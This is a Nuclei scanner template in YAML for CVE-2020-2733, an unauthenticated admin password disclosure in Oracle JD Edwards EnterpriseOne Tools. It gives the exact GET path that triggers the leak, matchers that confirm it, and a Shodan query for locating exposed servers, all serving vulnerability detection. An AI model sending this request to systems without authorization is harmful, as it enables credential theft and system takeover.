nuclei-templates/cves/2020/CVE-2020-2733.yaml

40 lines
1.3 KiB
YAML

id: CVE-2020-2733
info:
name: JD Edwards EnterpriseOne Tools - Admin Password Disclosure
author: DhiyaneshDk,pussycat0x
severity: critical
description: |
Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools.
reference:
- https://redrays.io/cve-2020-2733-jd-edwards/
- https://www.oracle.com/security-alerts/cpuapr2020.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-2733
classification:
cve-id: CVE-2020-2733
metadata:
verified: true
shodan-query: port:8999 product:"Oracle WebLogic Server"
tags: cve,cve2020,oracle,weblogic,disclosure,exposure
requests:
- method: GET
path:
- '{{BaseURL}}/manage/fileDownloader?sec=1'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ACHCJK'
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 200